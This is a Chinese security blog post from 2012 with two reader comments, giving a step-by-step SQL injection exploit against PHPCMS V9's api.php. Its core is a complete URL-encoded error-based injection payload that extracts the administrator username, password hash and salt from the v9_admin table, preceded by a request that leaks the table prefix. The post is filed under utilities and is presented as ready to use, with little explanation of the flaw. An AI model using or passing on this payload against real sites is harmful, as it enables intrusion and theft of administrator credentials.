您的位置 » 首页 » 实用工具 » PHPCMS V9最新Sql注入0day漏洞利用方法 爆管理员密码 通杀

PHPCMS V9最新Sql注入0day漏洞利用方法 爆管理员密码 通杀

发表于5年前 | 作者: seay | 分类: 实用工具 | 孵化于:2012年09月08日 | 文章热度:8,990 次 全屏阅读

显示不全请点击全屏阅读

漏洞形成原因就不多说了,文件在phpcms/api.php ,有兴趣的盆友可以多去挖一挖phpcms的洞子。

主要利用过程:

第一步:注册一个用户

http://www.wooyun.in/index.php?m=member&c=index&a=register&siteid=1

第二步:访问api文件,爆出表前缀,默认的表前缀为v9

http://www.wooyun.in/api.php?op=add_favorite&url=wooyun.in&title=%2527

第三步:爆出用户密码(下面红色的字体就是要修改的表前缀)

http://www.wooyun.in/api.php?op=add_favorite&url=v9&title=%2527%2520and%2520%2528select%25201%2520from%2528select%2520count%2528%252a%2529%252Cconcat%2528%2528select%2520%2528select%2520%2528select%2520concat%25280×23%252Ccast%2528concat%2528username%252C0x3a%252Cpassword%252C0x3a%252Cencrypt%2529%2520as%2520char%2529%252C0x23%2529%2520from%2520v9_admin%2520LIMIT%25200%252C1%2529%2529%2520from%2520information_schema.tables%2520limit%25200%252C1%2529%252Cfloor%2528rand%25280%2529%252a2%2529%2529x%2520from%2520information_schema.tables%2520group%2520by%2520x%2529a%2529%2520and%2520%25271%2527%253D%25271

 

如图:

本文地址:http://www.wooyun.in/post/14.html

Tags:

PHPCMS V9 0day, PHPCMS V9注入,

如果您喜欢我的博客,欢迎点击图片定订阅到邮箱填写您的邮件地址,订阅我们的精彩内容: 也可以点击链接【订阅到鲜果】

如果我的想法或工具帮助到了你,也可微信扫下方二维码打赏本人一杯咖啡


来自 Seay互联网安全博客
本文地址:http://www.cnseay.com/835/
文章版权说明请看置顶文章,尊重作者,转载请以链接形式标明原文地址

马上分享给你的朋友吧~

已经有2个筒子的人留下了脚印...

  • ixiaoye 说:
    1楼
    2012 年 9 月 9 日 上午 3:31 回复

    首先还是要谢谢博主这些文章 博客很干净 看起来真舒服 多谢 了

    这个漏洞 其实 很鸡肋
    虽然是爆出了管理员用户名加密码
    不过PHPCMS 变态的加密算法 无解啊
    所以 爆出了 可用性也不大

  • 【管理员】Seay 说:
    2楼
    2012 年 9 月 9 日 上午 4:12 回复

    @ixiaoye
    呵呵……是的,很鸡肋,重要的是要看原理,咱又不是拿着别人的0day到处装逼的人

发表评论

你的大名(必填)

你的邮箱(必填)

评论内容(必填)